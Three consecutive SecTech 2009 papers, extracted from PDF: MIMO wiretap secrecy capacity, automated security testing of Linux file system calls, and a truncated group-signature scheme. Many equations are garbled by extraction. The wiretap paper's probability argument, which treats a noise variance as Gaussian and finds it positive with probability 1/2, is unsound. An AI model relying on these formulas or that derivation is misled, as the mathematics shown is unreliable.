Abstract. Although conventional cryptographic security mechanisms are essential to the overall problem of security, the openness of wireless medium poses both threats and opportunities for securing transmission. In this paper, a Gaussian multiple input multiple output multiple eavesdropper (MIMOME) channel is considered where a transmitter is communicating to a receiver in the presence of an eavesdropper. We present a technique for determining the secrecy capacity of the MIMO channel under Gaussian noise. To do so, we transform the degraded MIMOME channel into multiple single input multiple output multiple eavesdropper (SIMOME) channels and then use scalar approach to convert it into two equivallent multiple input single output (MISO) channels. Keywords: Secrecy capacity, MIMO, wiretap channel, covariance matrix, fading.

1

Introduction

Wireless media is an open medium for communication and is vulnerable to eavesdropping. The openness of the transmission medium makes eavesdropping extremely easy and anyone within communication range can listen to the traffic in the air, and possibly extract information. However, the unique properties of wireless medium might provide ways of combating such security threats. For example, due to random fading, the intended receiver will have a channel different from an eavesdroppers’s when she is at a reasonable distance away. This difference can be utilized to secure the communication between the transmitter and the intended receiver. The eavesdropping attack was first studied by Wyner using a single-user wire-tap channel in [1]. Given the wire-tapper’s observation, secrecy is measured by the message equivocation rate at the wire-tapper and is defined as the entropy of the message at the wire-tapper. Wyner models the wire-tapper’s channel from the transmitter to the legitimate receiver as a degraded version of the channel, which is a reasonable assumption in a wired channel. Then he identifies the rateequivocation region and secrecy capacity. Wyner’s result was extended to the Gaussian wire-tap channel in [2] to show that Gaussian signalling is optimal. And the secrecy capacity was denoted as the difference between the capacities of the main and the eavesdropping channels. Csiszar and Korner [3] studied the general wiretap channel with single-transmitter, single-receiver, single-eavesdropper, ´ ezak et al. (Eds.): SecTech 2009, CCIS 58, pp. 108–115, 2009. D. Sl  c Springer-Verlag Berlin Heidelberg 2009 

MIMO Wiretap Channel: A Scalar Approach

109

discrete memoryless channel with secrecy constraints, and found the expression for the secrecy capacity. The expression is in the form of the maximization of the difference between two mutual informations involving an auxiliary random variable which is interpreted as performing pre-processing on the information. The secrecy capacity calculation for a given channel requires the solution of this maximization problem in terms of the joint distribution of the auxiliary random variable and the channel input. The use of multiple transmit and receive antennas has been shown in [4] and the results show that the achievable rates increases in the absense of secrecy constraints. Since the Gaussian multiple input multiple output (MIMO) wire-tap channel is a special case of the single-transmitter, single-receiver, single-eavesdropper wire-tap channel and it is not degraded in general, finding its secrecy capacity involves identifying the optimum joint distribution of the auxiliary random variable representing pre-processing and the channel input. A two-step solution procedure is followed by the researchers to solve this optimization problem for non-degraded channels. In the first step, a feasible solution is identified which is an achievable scheme, and in the second step a tight upper bound that meets this feasible solution is developed which is the tight converse. The first paper studying secrecy in MIMO communications [5] proposes an achievable scheme, where the transmitter uses its multiple transmit antennas to transmit only in the null space of the eavesdropper’s channel, thereby preventing any eavesdropping. In [6], the Gaussian single-input multipleoutput (SIMO) wire-tap channel is studied, and an equivalent scalar Gaussian channel is proposed. To do so, the channel was transformed into a scalar Gaussian wiretap channel using standard techniques of communication theory. The result is then used to study the impact of slow fading on the secrecy capacity of the channel. Secrecy capacity in terms of outage probability is proposed in [7,8] and a complete characterization of the maximum transmission rate at which the eavesdropper is unable to decode any information is provided. It is shown that in the presence of fading, information theoretic security is achievable even when the eavesdropper has a better average signal-to-noise ratio (SNR) than the legitimate receiver. In this paper we try to find out the secrecy capacity of a MIMOME channel using a scalar gaussian approach. We consider that the MIMOME channel is a combination of several SIMOME channels and find out the secrecy capacity. It is to be noted that the MIMO wiretap channel is synonym to MIMOME channel. The remainder of this paper is organized as follows: In section 2, we describe the MIMO Gaussian wiretap channel. In section 3, capacity analysis is done. Then section 4 concludes this paper.

2

MIMO Gaussian Wiretap Channel

We consider a degraded communication system shown in fig. 1 as our system with a transmitter, a receiver and an eavesdropper, each equipped with multiple antennas. A legitimate user named Alice wants to send messages to another user, say Bob. The message block is encoded into a codeword and transmitted over a

110

M.R. Islam and J. Kim

w

n

x

y

H

G

Bob

Alice

z Eve

Fig. 1. Degraded broadcast channel

discrete time channel. A third party named Eve is capable of eavesdropping the signals sent by Alice by observing the channel output. The user and eavesdropper channel attenuations can be represented by Nr × Nt and Mr × Nr vectors H and G, where Nt is the number of transmit antennas whereas Nr and Mr are the number of antennas at the legitimate receiver and eavesdropper. Our objective is to determine the secrecy capacity of the MIMO Gaussian wiretap channel using the scalar approach. The received signals at the receiver and the eavesdropper at k-th time slot are y[k] = Hx[k] + n[k]

(1)

z[k] = Gy[k] + w[k]

(2)

where n and w are independent random vectors, each one of them being complex and jointly Gaussian distributed with mean 0 and non-singular covariance matrices Σ1 and Σ2 respectively. H and G are known and fixed. When the main and eavesdropper channel experiences fading, H and G are assumed to be a vector of i.i.d. zero mean unit-variance complex circularly symmetric gaussian random variables. Theorem 1. A MIMOME channel can be represented as a summation of several gaussian wiretap channels and the main channel and eavesdropper channel output can be written as y[k] =

Nt 

(h2i xi [k] + ni [k])

(3)

Nt  (gi2 xi [k] + wi [k])

(4)

i=1

and z[k] =

i=1

Proof: A multiple input multiple output multiple eavesdropper (MIMOME) channel can be seen as a multiple parallel single input multiple output multiple eavesdropper (SIMOME) channel. From [6] we know that a SIMOME channel can be represented by yi [k] = h2i xi [k] + ni [k].

(5)

MIMO Wiretap Channel: A Scalar Approach

111

and zi [k] = gi2 xi [k] + wi [k].

(6)

Therefore, Eq. 5 and eq. 6 proves the theorem 1. In the next section, we will derive the secrecy capacity using these results.

3 3.1

Capacity Analysis Secrecy Capacity

The equivocation rate Re , is the conditional entropy of the transmitted message, conditioned on the received signal at the eavesdropper. The equivocation rate is a measure of the amount of information that the eavesdropper can attain about the message, and quantifies the level of secrecy in the system. The secrecy capacity, CS , is the largest rate R achievable with perfect secrecy, i.e., Re = R. The main channel capacity for SIMOME can be written like the following 1 log(1 + h2i P ) 2 1 −1 = log(1 + h†i Σ1i hi P ) 2

CMi =

Again the eavesdropper channel capacity for SIMOME is 1 log(1 + gi2 P ) 2 1 = log(1 + (Ghi )† (GΣ1i G† + Σ2 )−1 Ghi P ) 2

CWi =

The MIMOME channel can be thought of multiple SIMOME channels and according to fig. 2 a MIMOME channel can be converted to two MISO channels, one is for the main channel and the other is for the eavesdropper channel. Consider the channel gain parameter for main channel is hm = [h21 , h22 , ..., h2Nt ] and 2 eavesdropper channel is gm = [g12 , g22 , ..., gN ]. Also consider the channel knowlt edge of the main channel and the eavesdropper channel are unknown at the transmitter and the channel capacity for MIMOME channel can be written as   hm 2 P 1 CM = log 1 + 2 Nt CW

  gm 2 P 1 = log 1 + 2 Nt

Remark 1: Assume that the MISO channels are identical for both the main channel and eavesdropper channel ie. h21 = h22 = ... = h2Nt = h2 and g12 = g22 = 2 ... = gN = g 2 . Therefore the capacity equations become t CM =

  1 log 1 + h2 P 2

(7)

112

M.R. Islam and J. Kim

H11 x

H12

H13

y

G11

G13

G12

G21

z y x

G22

h2 g2

G23 G31

z

G32 G33

(a) x

H11 H13 H21 H23 H31

H12

y

G11

G13

G12

G21

H22

z

x h12

G22

G23 G31 H32 H33

y

h22 h32

G32

g12 g22

z

g32

G33

(b) Fig. 2. (a) 2 output representation of SIMOME channel (b) 2 output representation of MIMOME channel

CW =

  1 log 1 + g 2 P 2

(8)

This is the same as the converted SIMOME channel as capacity does not increase using multiple SIMOME. So, the secrecy capacity can be written from [6] as   1 + h2 SNR 1   CS = log σ2 h2 2 1 + 12 2 SNR

(9)

σ1 +σ2

Remark 2: From the previous equation 9, it can be shown that σ22 > 0 makes σ12 < 1 and in turn makes the secrecy capacity CS positive. An interesting σ12 +σ22 conclusion is that the secret communication is possible when the eavesdropper channel is noisy. 3.2

Existence of Secrecy Capacity

Now we consider the existence of secrecy capacity in the main channel transmission. We know from the previous section that the secret communication is possible when the eavesdropper channel is noisy. Again from eq. 1 and eq. 2 we know that n and w are independent random vectors, each one of them are jointly Gaussian distributed with mean 0 and non-singular covariance matrices Σ1 and Σ2 respectively. As Σ1 = σ12 INr and Σ2 = σ22 IMr , the probability distribution for σ12

MIMO Wiretap Channel: A Scalar Approach 2 2

113 2 2

and σ22 can be written as P r{σ12 } = √12π e−(σ1 ) /2 and P r{σ22 } = √12π e−(σ2 ) /2 . It is to be noted that the secrecy capacity CS becomes positive when σ22 > 0. Proposition 1: The probability of existence of a nonzero secrecy capacity where the channel knowledge for both main and eavesdropper channels are unknown is given by   Pr (CS > 0) = Pr σ22 > 0 ∞ 2 2 1 = √ e−(σ2 ) /2 dσ22 2π 0 1 1 = erf c(0) = 2 2

∞ 2 where erf c(z) = √2π z e−t dt. 3.3

Outage Probability under Slow Fading

In contrast with the Gaussian wiretap channel, the fading scenario doesnt requre the average SNR of the main channel to be greater than the average SNR of the eavesdropper’s channel for a strictly positive (outage) secrecy capacity. In the presence of fading there is always a finite probability that the instantaneous SNR of the main channel is higher than the instantaneous SNR of the eavesdropper’s channel [7]. We now extend the idea of secrecy capacity to the case when the channel parameters are random but fixed for all time. In slow fading, H and G are random processes and the secrecy capacity is no longer a deterministic value but a random process itself. We denote the outage event as Outage = CS < R ; R > 0

(10)

and the probability of outage as Pout = Pr{CS < R}

(11)

Proposition 2: The probability of outage can be written as Pout = Pr{CS < R}   1 + h2 SNR 1  < R} = Pr{ log  σ2 h2 2 1 + 12 2 SNR

(12)

σ1 +σ2

Remark 3: If the main channel is extremely noisy, we can take σ12 >> σ22 and the CS → 0. In this case, the system is in outage with probability 1. On the other hand, if the eavesdropper channel is extremely we  noisy then  can take 1 2 σ12 << σ22 and the secrecy capacity C tends to log 1 + h SNR . Therefore S  2 eq. 12 reduces to Pout = Pr{ 21 log 1 + h2 SNR < R}.

114

4

M.R. Islam and J. Kim

Conclusion

We considered a MIMOME channel where a transmitter is communicating to a receiver in the presence of an eavesdropper. The transmitter, receiver and the eavesdropper are equipped with multiple antennas. We presented a technique for determining the secrecy capacity of the MIMOME channel under Gaussian noise. To do so, we transformed the MIMO Gaussian wiretap channel into multiple SIMO Gaussian wiretap channel and then used scalar approach using standard techniques of communications theory. We derived secrecy capacity equation and the result shows that the existence of secrecy capacity depends on the eavesdropper noise level. We also analyzed the probability of outage in a slow fading scenario.

Acknowledgment This work was supported by Korea Research Foundation (grant no.: 2009-0074806).

References 1. Wyner, A.D.: The wire-tap channel. Bell Syst. Tech. J. 54(8), 210 (1975) 2. Leung, S.K., Cheong, Y., Hellman, M.E.: The Gaussian wire-tap channel. IEEE Trans. on Information Theory 24(4), 451–456 (1978) 3. Csiszar, I., Korner, J.: Broadcast channels with confidential messages. IEEE Trans. on Information Theory 24(3), 339–348 (1978) 4. Telatar, I.E.: Capacity of multi-antenna Gaussian channels. European Trans. Telecommunications 10, 585–595 (1999) 5. Negi, R., Goel, S.: Secret communication using artificial noise. In: IEEE Vehicular Technology Conference, Toulouse, France (May 2006) 6. Parada, P., Blahut, R.: Secrecy capacity of SIMO and slow fading channels. In: IEEE International Symposium on Information Theory, Adelaide, Australia (September 2005) 7. Barros, J., Rodrigues, M.: Secrecy capacity of wireless channels. In: IEEE International Symposium on Information Theory, USA (2006) 8. Bloch, M., Barros, J., Rodrigues, M., Mclaughlin, S.: Wireless information theoretic security. IEEE Transactions on Information Theory 54(6), 2515–2534 (2008) 9. Cover, T., Thomas, J.: Elements of Information Theory. Wiley, Chichester (1991) 10. Horn, R.A., Johnson, C.R.: Matrix Analysis. Cambridge University Press, Cambridge (1987) 11. Li, X., Ratazzi, E.P.: MIMO transmissions with information theoretic secrecy for secret key agreement in wireless networks. In: IEEE Military Communications Conference (MILCOM 2005), Atlantic City, NJ (2005) 12. Li, X., Chen, M., Ratazzi, E.P.: Space time transmissions for wireless secret key agreement with information-theoretic secrecy. In: IEEE International Workshop on Signal Processing Advances in Wireless Communications (SPAWC 2005). The Italian Academy at Columbia University, New York (2005)

MIMO Wiretap Channel: A Scalar Approach

115

13. Viswanath, P., Tse, D.: Fundamentals of wireless communications, class notes for ECE 459, Department of Electrical and Computer Engineering, University of Illinois at Urbana Champaign (Fall 2003) 14. Shafiee, S., Liu, N., Ulukus, S.: Secrecy Capacity of the 2-2-1 Gaussian MIMO Wire-tap Channel. In: ISCCSP (2008) 15. Islam, M.R., Kim, J., Arefin, M.S.: Secrecy capacity of MIMO channels. In: ICECE (2008)

Security Testing for Operating System and Its System Calls* Gaoshou Zhai, Hanhui Niu, Na Yang, Minli Tian, Chengyu Liu, and Hengsheng Yang School of Computer and Information Technology, Beijing Jiaotong University, Shang Yuan Cun 3#, Hai Dian District, Beijing 100044, China [email protected]

Abstract. It is very important but quite difficult to test the security of an operating system. In this paper, some essential problems about security testing of an operating system are discussed, including conception and extension of security testing, feasibility and technical scheme for automated security testing of an operating system, security of system calls, testing sequence for system calls, and etc. Thereafter, a prototype system (i.e. a series of testing tools) for automated security testing of system calls is designed and implemented based on Fedora 9 and Linux kernel 2.6.25-14.fc9.i686, which is made up of control module, objects setup module, standard test module, special test module and test configuration database for each system call. Furthermore, test cases as well as test results for systems calls such as creat, access and etc are discussed and analyzed. Finally, the research work in this paper is summarized while further research directions are pointed out. Keywords: Operating systems, security testing, test automation, system calls, Linux.

1 Introduction It's commonly accepted that operating systems and their security are of the greatest importance to entire information systems [1]. Therefore, testing and evaluating the security of operating systems becomes a key problem in domain of information security [2]. Although some security evaluation criteria such as TCSEC [3] and CC [4] are released, security testing for an operating system is still a quite difficult problem because of its largeness and complexity. In this paper, some essential problems about security testing of an operating system are discussed at first, including conception and extension of security testing, feasibility and technical scheme for automated security testing of an operating system, security of system calls, testing sequence for system calls, and etc. Moreover, both the feasibility and the solution about automatic security testing of system calls are analyzed for Linux operating systems. In view of the huge number of Linux system *

The research presented in this paper was performed with the support of Beijing Jiaotong University Grants for 2005SM016.

D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 116–123, 2009. © Springer-Verlag Berlin Heidelberg 2009

Security Testing for Operating System and Its System Calls

117

calls, the security of system calls and the determining principle of security testing sequence are further discussed. Thereafter, a prototype system for automated security testing of system calls is designed and implemented based on Fedora 9 and Linux kernel 2.6.25-14.fc9.i686, which is made up of control module, objects setup module, standard test module, special test module and test configuration database for each system call. Control module is used to control test process. Standard test module and special test module are used for testing the different aspects of system calls. Except the definition of some common global variables, the rest of the test preparation works such as setting up test environment and creating objects are finished by test configuration database and objects setup module together. Furthermore, test cases as well as test results for systems calls such as creat, access, chmod, chown, mkdir and etc are discussed and analyzed. Finally, the research work in this paper is summarized while some further research directions are pointed out.

2 Theoretical Foundation Above all, conception of security testing ought to be clarified. Then feasibility for automated security testing of an operating system is discussed. And the corresponding technical scheme is outlined and security testing sequence for different system calls are further discussed. 2.1 Conception and Extension of Security Testing Security testing is a form of system testing whereby you try to compromise the security mechanisms of an application or system, and it is the process of attempting to devise test cases that subvert the program's security checks [5]. From the view of modern software engineering, security testing [2] spread all over the entire software developing lifecycle and test objects encompass not only source codes and execution system, but also documents, procedure management of development and etc. Meanwhile, methods of formal validation, informal validation (e.g. reviewing, discussion, validation and system testing) and simulated intrusion detection can be used to implement security testing. Obviously, method of system testing is essential for security testing of operating systems. Security testing is different from security evaluation especially in that the latter is always performed by those officially authorized organizations or agents, i.e. thirdparty security certification organization. At the same time, they are interrelated in many aspects. For example, the former can be viewed as part of the latter and they both depend on security requirements of target system. In order to devise sufficient but appropriate test cases for security testing, known security problems or bugs in similar systems can be studied according to published sources in magazines, chat rooms, newsgroups or internet. However, formulating test cases ought to be making overall plans and take all factors into consideration from the beginning. In other words, security requirements of target system should be analyzed and extracted based on security objectives, function requirements and/or security

118

G. Zhai et al.

mechanisms of the system and some information evaluation criteria such as TESEC and CC in the first place. For operating systems, security testing ought to be focused on security objectives such as confidentiality, integrity, usability, traceability and etc, and system functions especially those security-supported functions inside the kernel (for example, functions operating on some key system resources such as process control blocks and related to authorization mechanisms). 2.2 Security Testing Automation for an Operating System For security testing of an operating system is time consuming, cost consuming and boresome, technologies of software testing automation ought to be used and that is feasible. Moreover, automatic security testing platform [2] for an operating system can be made up of documents consistence check module, system-call integrated tester, intrusion detection module, command testers, system call testers, configuration checker, security audit tester and security function configuration interface (Fig. 1 shows its framework).

Fig. 1. Framework of automatic security testing platform for an operating system

2.3 Security Testing of System Calls System calls are the only way for system kernel to provide user processes with services and they are the sole access for user processes to turn into system kernel. In other words, they are indispensable interface for users to use computer to do something or for applications to be executed to perform some tasks. Therefore, security testing of system calls is the most important. Security of system calls ought to be analyzed before the security testing starts. For there are so many system calls in an operating system (e.g. there are over 300 system calls in Linux), only a few system calls which are familiar to us can be studied from the beginning. System calls related to file operation are selected to be discussed in this paper. In addition, relationships among system calls are taken into account to decide testing sequence for different system calls so as to improve reuse of testing codes and to reduce test costs.

Security Testing for Operating System and Its System Calls

119

3 Prototype Design and Implementation A powerful automated testing framework must provide tools that address test planning, test design, test construction, test execution, and test results verification [6]. In the following section of this paper, automatic security testing of system calls are discussed in detail. 3.1 Basic Framework Fig. 2 shows the basic steps to test a system call, where OS represents operating system and security state ought to be composed of security attributes related to subjects, objects, system authorization architecture and etc. In order to modularize the security tester of system call, test contents are divided into two parts, i.e. standard security testing and special security testing. Standard security testing is to test whether the change of security attributes make the system turn from a secure state to an insecure state. Meanwhile, special security testing is to test execution effects of security-support functions and it is available only for some particular system calls. Therefore, a security tester of system call can be made up of control module, objects setup module, standard test module, special test module and test configuration database for each system call. Control module is used to control test process in an orderly way so as to ensure its automation. Standard test module and special test module are used for testing the different aspects of system calls accordingly as above. Except the definition of some common global variables, the rest of the test preparation works such as setting up test environment and creating subjects (e.g. users with specified permissions and/or process with specified functions and permissions) and objects (e.g. files and/or directories) are finished by test

Fig. 2. Basic steps to test a system call

120

G. Zhai et al.

Objects setup module Create various required subjects and objects

Control module

Standard test module

Initialize related data structure to set up testing environment

Test configuration

Track and record security testing

Control test stage of security testing

Generate test reports Clean up testing environment

First-level test cases library

Execute system call Compare and check security attributes Verify testing results

Second-level test cases library

Special test module Test configuration

Execute system call

Verify testing results

Fig. 3. Framework for automatic security tester of system call

configuration database (provide standard security testing with security attributes) and objects setup module together. Fig.3. shows a detailed framework for automatic security tester of system call. 3.2 Prototype Implementation A prototype system (i.e. a series of testing tools) for automated security testing of system calls is designed and implemented based on Fedora 9 and Linux kernel 2.6.2514.fc9.i686. And it is programmed in C language. It ought to be pointed out that only some system calls related to file operation are selected (including creat, access, chmod, chown and mkdir) in the prototype. In addition, security testing scope is limited to the basic security mechanism of discretionary access control at the current stage. Executable file of security tester for each system call is generated by compiling the source file contain control module and the source file for corresponding system call and linked. So that security testing for each system call can be done by executing the

Security Testing for Operating System and Its System Calls

121

executable file of corresponding security tester. In addition, script program is written to make security testing integrated and to cover multiple system calls.

4 Security Testing Execution and Results Analysis Test cases for systems calls such as creat, access, chmod, chown and mkdir are devised respectively, and the number of test cases is 46 in whole. 4.1 Test Cases Design Only test cases for creat are discussed in detail below so as to avoid oversize length of contents. The system call of creat is used to create a file and the created file can be an ordinary file or a directory file. Its prototype is as follows: asmlinkage long sys_creat(const char *pathname, int mode); When creat is invoked, various parameters can be selected and be set so as to implement different functions. There are totally 6 test cases formulated for standard security testing as to creat. Test scenes include such cases to truncate an existed non-empty ordinary file, or to truncate an existed empty ordinary file, or to create a new file or directory. Therefore, three types of files are required for standard security testing of creat, i.e. an existed ordinary file (e.g. creat.reg), a newly created directory file (e.g. creat.dir) and a file (creat.reg or creat.dir) to be created in the directory of creat.dir. And ACL for files can be set empty or not. In addition, both uid and gid of process is set to 501, while uid and gid of file owner is set to 501 as well. Two test cases for standard security testing of creat are illustrated in Table 1 and Table 2 respectively. Table 1. Test case CSYL-CREAT-BZ1# for standard security testing of creat

Test scene Requirement for object ACL Test Steps

Expected results

To truncate an existed non-empty ordinary file NONE (1) Create an ordinary file named by creat.reg under current path and set its mode to 0700. Then write some data in that file. (2) Invoke and execute the system call of creat with file name valued by creat.reg. (3) Check whether ACL values of creat.reg are consistent before and after invoking creat. (4) Check whether creat.reg becomes an empty file. (1) Invoking creat successfully. (2) Both ACL values of creat.reg are empty before and after invoking creat. (3) creat.reg becomes an empty file.

122

G. Zhai et al.

Special security testing of creat is focus on its parameter of PATHNAME. There are totally 8 test cases formulated for special security testing as to creat, which suppose that string address specified by PATHNAME is beyond permissive access space, or that destination pathname specified by PATHNAME is not a valid pathname, or that destination pathname specified by PATHNAME can not be accessed for nonauthorization, or that destination pathname specified by PATHNAME is not existed, or that euid of current process is not matched with the owner of the file and it has no permission of the latter, or that depth of the destination pathname specified by PATHNAME exceeds the upper limit PATH_MAX, or that length of the file name in the destination pathname specified by PATHNAME exceeds the upper limit NAME_MAX, or that there are too more symbol links for the file to be created, respectively. And a test case for special security testing of creat is illustrated in Table 3. Table 2. Test case CSYL-CREAT-BZ4# for standard security testing of creat

Test scene Requirement for object ACL Test Steps

Expected results

To truncate an existed non-empty ordinary file user::--- mask::--- group::rwx other::--(1) Create an ordinary file named by creat.reg under current path and set its mode to 0700. Then write some data in that file. (2) Change ACL of the file creat.reg with requirement for object ACL. (3) Invoke and execute the system call of creat with file name valued by creat.reg. (4) Check whether ACL values of creat.reg is consistent before and after invoking creat. (5) Check whether creat.reg become an empty file. Invoking creat fails and returns -1 with error number valued by EACCES. Obviously, both ACL check and empty check are unnecessary.

Table 3. Test case CSYL-CREAT-TS1# for special security testing of creat

Test scene Test Steps

Expected results

Suppose that string address specified by PATHNAME is beyond permissive access space (1) Invoke the system call of creat with its parameter PATHNAME valued by a char pointer referred to -2. (2) Check return value of invoking creat. Invoking creat fails and returns -1 with error number valued by EFAULT which stands for address fault.

4.2 Test Results Analysis The Prototype runs and gets all expected results for all those system calls including creat, access, mkdir, chmod and chown and for all their corresponding test cases. That

Security Testing for Operating System and Its System Calls

123

is to say, they all can be executed in the course of nature under permissions and corresponding changes of security attributes are adhere to established requirements. On the other hand, they all refuse to perform specified functions or tasks and return corresponding error codes without permissions.

5 Summary Security testing is discussed from its conception to its relation with security evaluation. Framework of automatic security testing platform for an operating system is outlined and security testing of system calls is emphasized and expound further. Thereafter, a prototype system for automated security testing of system calls is designed and implemented based on Fedora 9 and Linux kernel 2.6.25-14.fc9.i686. Prototype framework and its corresponding components with test cases for fileoperation-related systems calls such as creat, access and etc are presented in detail. Preliminary test results are satisfactory, which shows that our automatic security testing methods for operating system and its system calls feasible and effective. Nevertheless, there are still many works to be done for largeness and complexity of operating system and the huge number of Linux system calls. More system calls ought to be analyzed and to be tested automatically and not limited to discretionary access control but extended to other security mechanisms such as mandatory access control. In other words, security requirement should be extracted, expanded and refined based on further study on operating system and/or security evaluation criteria and/or protected profiles. Automaton theory and clustering method are expected to be used to reduce security states and to build integrated system-call tester. In addition, Methods for quality evaluation of security test ought to be studied as well in future.

References 1. Zhai, G., Li, Y.: Analysis and Study of Security Mechanisms inside Linux Kernel. In: Proceedings of 2008 International Conference on Security Technology (SECTECH 2008), pp. 58–61. IEEE Computer Society, Los Alamitos (2008) 2. Zhai, G., Zeng, J., Ma, M., Zhang, L.: Implementation and Automatic Testing for Security Enhancement of Linux Based on Least Privilege. In: Proceedings of the 2nd International Conference on Information Security and Assurance (ISA 2008), pp. 181–186. IEEE Computer Society, Los Alamitos (2008) 3. Trusted Computer Systems Evaluation Criteria, US DoD 5200.28-STD (1985) 4. Common Criteria for Information Technology Security Evaluation. Version 2.2 (2008) 5. Myers, G.J., Badgett, T., Thomas, T.M., Sandler, C.: The Art of Software Testing, 2nd edn. John Wiley & Sons Inc., New Jersey (2004) 6. Mosley, D.J., Posey, B.A.: Just Enough Software Test Automation, 2nd edn. Pearson Education Inc., New Jersey (2002)

Efficient Group Signature with Forward Secure Revocation Haimin Jin1,2,3 , Duncan S. Wong3 , and Yinlong Xu1,2 1

School of Computer Science University of Science and Technology of China, Hefei, China 2 The Key Laboratory on High Performance Computing Anhui Province, Hefei, China [email protected], [email protected] 3 Department of Computer Science City University of Hong Kong

Abstract. Forward secure revocation for group signature allows a revoked group member to preserve the anonymity of its signatures generated before the revocation. Most of the existing schemes of this type either have the signing or verifying complexity linear to the group size or the number of revoked members, or require the updates of signing key or public key once revocation occurs. Recently, an outstanding improvement has been made in Nakanishi et al.’s proposal [15]. However, the size of public key in their scheme is linear to the group size. In this paper, we propose a new forward secure revocable group signature scheme satisfying 1) constant signing and verifying complexity, 2) constant size in signature, public key and signing key, 3) no updates of public key or signing key are required when member joining or delete occurs.

1

Introduction

Group signature [11] is a signature scheme which allows a member of a group to sign messages on behalf of the group in such a way that no one can tell who the actual signer is (i.e. anonymity) except the group manager. The group manager is responsible for enrolling new members and identifying the actual signer in case of dispute (i.e. traceability). Besides enrolling new members into a group, in some applications, they also require the group manager to remove members from the group (i.e. revocability) [3]. Once a user is removed, the user can no longer generate any signature for the group. An additional yet natural requirement is that after a user is revoked, its old signatures generated before the revocation should remain anonymous (i.e. forward secure revocation) [3]. In recent years, several forward secure revocable group signature schemes have been proposed [2, 4, 6, 7, 15, 16, 17]. Among them, the schemes proposed in [2, 6, 17] cannot achieve constant signing and verifying computational complexity. Camenisch and Lysyanskaya proposed an elegant revocable scheme[8] using dynamic accumulators. In this scheme, the complexity of signing/verifying ´ ezak et al. (Eds.): SecTech 2009, CCIS 58, pp. 124–131, 2009. D. Sl  c Springer-Verlag Berlin Heidelberg 2009 

Efficient Group Signature with Forward Secure Revocation

125

constant. However, the disadvantage of this scheme is that, whenever making a signature, the signer has to modify his signing key due to member joining or delete. Some improvements have been done in [4] and [7] that the updates of keys are only required when member revocation occurs. However, forward secure revocation is not carefully and formally analyzed in their schemes. Recently, a forward secure revocable group signature scheme with constant signing/verifying complexity was proposed in [15]. However, the size of group manager’s public key is set to the group size, and which must be fixed in advance. Our Results. We propose a new group signature scheme which satisfying 1) forward secure revocation, 2) constant signing and verifying complexity, 3) constant size of the signature, group manager’s public key and signer’s key, 4) constant tracing complexity, 5) no updates of public key or signing key are required when member joining or delete occurs. Related Work. Since the introduction of group signature by Chaum and van Heyst [11], there have been a number of other schemes proposed [1, 2, 6, 8, 14]. For schemes proposed earlier [11, 14], they all have signature size and signing complexity linear to the group size. The first scheme achieving constant size and complexity is due to Camenisch and Stadler [10]. In [3], Ateniese and Tsudik introduced the revocability property. There are two main types of revocable group signature schemes. The first type is the VLR (Verifier-Local Revocation) method [2, 3, 5], which has a Certificate Revocation List (CRL). The CRL contains information about the revoked users. It is used for determining if a signature is generated by a revoked member during signature verification. However the verifying complexity of the VLR mechanism is usually linear to the number of the revoked members. Another type of schemes [4, 6, 7, 8] is based on accumulators. In these schemes, an accumulator is employed for storing information about the legitimate group members. During signature generation, a signer produces a membership proof in association with a signature. The membership proof shows anonymously that the accumulator contains the signer’s information (i.e. membership certificate). If the signer is revoked, the information specific to the signer will be removed from the accumulator and the signer will no longer be able to produce a valid membership proof. Different from the above, in our construction, we employ an accumulator which can do non-membership proof on it. We store information about revoked members into the accumulator. When generating a signature, a signer produces a non-membership proof to anonymously show that the accumulator does not contain any information about the signer.

2

Definitions

Definition 1 (Revocable Group Signature). A group signature scheme with membership revocation consists of five probabilistic polynomial-time (PPT) algorithms and one interactive protocol. The entities involved in the scheme are a group manager, a group member (i.e. a signer) and a verifier.

126

H. Jin, D.S. Wong, and Y. Xu

– G.Kg: On input a security parameter l ∈ N, the group manager outputs a master public key mpk, a master secret key msk (for enrolling group members), a trace key tk (for opening a signature) and an initialized membership information Ω. – G.Enroll: This is an interactive protocol running between the group manager and a new user with identity i ∈ N. Through this protocol, the member i obtains a user signing key uski , a (public) user membership key upki , and a user revocation key rvki . – G.Revoke: On input mpk, rvki (of member i) and the current membership information Ω, the group manager outputs an updated Ω. – G.Sign: On input mpk, upk, usk, rvk, Ω and a message m, it outputs a group signature σ. – G.Ver: On input mpk, Ω, m and σ, it outputs 1 or 0 indicating accept or reject on the validity of the signature σ on message m. – G.Open: On input mpk, tk, c and a valid message-signature pair (m, σ), the group manager outputs upk of the actual signer. Remark: A group signature scheme without membership revocation only differs from the definition above slightly. It does not have G.Revoke and therefore does not need rvk or revocation membership information Ω.

3

Signature of Knowledge

We use signature of knowledge as building blocks. Many group signature schemes use this notion [6], [15], [1]. This cryptographic tool is derived from the signature scheme [13], which allows one party to prove the knowledge of secret values without revealing any information on them. Since it is message independent (based on signature schemes), we call them signature of knowledge to avoid confusion with zero-knowledge proofs. In this paper, we use SP K[(x1 , ..., xt ) : R1 (x1 , ..., xt )∧...∧Rn (x1 , ..., xt )](m) to denote the signature of knowledge, which is a signature of message m by a signer who knows the secret values x1 , ..., xt satisfying all the relations R1 (x1 , ..., xt ) and ... and Rn (x1 , ..., xt ). The signature of knowledge of representation (informally in the form of SP K[(x, y) : c = g x hy mod n](m)) is proposed in [12], and the signature of knowledge of representation with parts in intervals (informally in the form of SP K[(x, y) : c = g x hy mod n∧ x ∈ [X − 2l , X + 2l ]](m)) is proposed in [9].

4

Our Scheme and Security Analysis

According to Def. 1, our scheme is constructed as follows. 1. G.Kg With the input of  > 1, k, lp ∈ N which are the security parameters, the group manager chooses the following parameters: λ1 , λ2 , γ1 and γ2 such that λ1 > (λ2 + k) + 2, λ2 > 4lp , γ1 > (γ2 + k) + 2, and γ2 > λ1 + 2. Define

Efficient Group Signature with Forward Secure Revocation

127

